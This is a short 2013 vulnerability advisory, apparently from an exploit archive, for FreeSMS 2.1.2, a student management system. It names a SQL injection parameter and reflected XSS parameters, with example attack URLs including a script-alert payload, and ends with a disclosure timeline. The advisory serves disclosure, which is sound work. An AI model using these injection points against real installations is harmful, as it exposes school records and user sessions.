Home / exploits FreeSMS Free Student Management System 2.1.2 Multiple Vulnerability
Posted on 01 October 2013
##################### ______ __ ______ / / | / /000000 | ______ ______ ______ 00 |____ _____ ____ ______ /000000 | ______ _______ 00 \__00/ / / / 00 / / / 00 \__00/ / / | 00 000000 |/000000 |000000 |0000000 |000000 0000 | 000000 | 00 /000000 |/0000000/ 000000 | / 00 |00 | 00/ / 00 |00 | 00 |00 | 00 | 00 | / 00 | 000000 |00 00 |00 | / \__00 |/0000000 |00 | /0000000 |00 | 00 |00 | 00 | 00 |/0000000 | / \__00 |00000000/ 00 \_____ 00 00/ 00 00 |00 | 00 00 |00 | 00 |00 | 00 | 00 |00 00 | 00 00/ 00 |00 | 000000/ 0000000/ 00/ 0000000/ 00/ 00/ 00/ 00/ 00/ 0000000/ 000000/ 0000000/ 0000000/ ##################### # Exploit Title: FreeSMS (Free Student Management System) 2.1.2 Multiple Vulnerability # Date: 1 Oct 2013 # Vendor Homepage: http://freesms.sourceforge.net/ # Software Link: http://sourceforge.net/projects/freesms/ # Version: 2.1.2 # Tested on: Win 7/Backtrack # CVE : # Exploit Author: Sarahma Security # Author Homepage: http://sarahma.co.id # Author Email: research@sarahma.co.id ======================== SQL Injection ======================== Found on http://localhost/freesms/pages/crc_handler.php parameter : scheduleid http://localhost/freesms/pages/crc_handler.php?method=evaluation&func=getanswers&scheduleid=15{SQL_HERE} ======================== XSS Vulnerability ======================== Found On http://localhost/freesms/pages/crc_login.php parameter : uid Found On http://localhost/freesms/pages/crc_handler.php parameter : func and method Example: http://localhost/freesms/pages/crc_handler.php?method=profile&func=%3Cscript%3Ealert%28123%29%3C/script%3E ======================== Solution : ======================== No Update Until This Advisory published ======================== Timeline: ======================== 2013-09-26 Provided details vulnerability to vendor 2013-09-29 No Response From Vendor 2013-10-01 Advisory published
